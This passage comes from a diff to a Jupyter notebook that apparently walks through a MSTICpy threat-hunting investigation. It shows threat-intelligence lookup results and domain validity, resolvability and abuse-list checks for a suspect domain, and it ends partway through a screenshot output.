bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'”&nbsp;“&nbsp;liaise',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'august',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'june',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'april'],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'targeted_countries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_has_agents':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_scannable':&nbsp;True,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'upvotes_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'validator_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'vote':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'votes_count':&nbsp;0}],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'references':&nbsp;['https://www.agari.com/cyber-intelligence-research/whitepapers/acid-agari-cosmic-lynx.pdf']},<br>&nbsp;'sections':&nbsp;['general',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'geo',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'url_list',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'passive_dns',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'malware',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'whois',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'http_scans'],<br>&nbsp;'type':&nbsp;'domain',<br>&nbsp;'whois':&nbsp;'http://whois.domaintools.com/secure-ssl-sec.com'}</pre>\n",
+       "        </details>\n",
+       "        "
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "# TI Lookups\n",
+    "ti_resp = ti.lookup_iocs(data=iocs, obs_col=\"Observable\")\n",
+    "select_ti = browse_results(ti_resp, severities=['high','warning'])\n",
+    "select_ti"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Review domain\n",
+    "We have appear to have identified a malicious domain to go with the IP address identified earlier in our investigation. In order to complete our investigation we want to get some context on this domain in the same way we did with the IP address. Again MSTICpy has a number of tools to help with this, including features to [validate a domain](https://msticpy.readthedocs.io/en/latest/getting_started/PackageSummary.html?highlight=screenshot#domain-utils) and [screenshot a URL](https://msticpy.readthedocs.io/en/latest/getting_started/PackageSummary.html?highlight=screenshot#domain-utils).\n",
+    "\n",
+    "> Note: these tools use publicly-available services such as *abuse.ch* and *Browshot*"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 38,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<p style=''>Is secure-ssl-sec.com a valid domain?  <b>True</b></p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<p style=''>Is secure-ssl-sec.com resolvable? <b>True</b></p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<p style=''>Is the TLS cert used by secure-ssl-sec.com in abuse.ch's abuse list? <b>False</b></p>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "dom = select_ti.value[0]\n",
+    "dom_val = domain_utils.DomainValidator()\n",
+    "md(f\"Is {dom} a valid domain?  <b>{dom_val.validate_tld(dom)}</b>\")\n",
+    "md(f\"Is {dom} resolvable? <b>{dom_val.is_resolvable(dom)}</b>\")\n",
+    "md(f\"Is the TLS cert used by {dom} in abuse.ch's abuse list? <b>{dom_val.in_abuse_list(dom)[0]}</b>\")"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 39,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Getting screenshot\n"
+     ]
+    },
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "406c1b88717f43e4ab2e8da7f531aa7f",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "IntProgress(value=0, max=40)"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "image/png": "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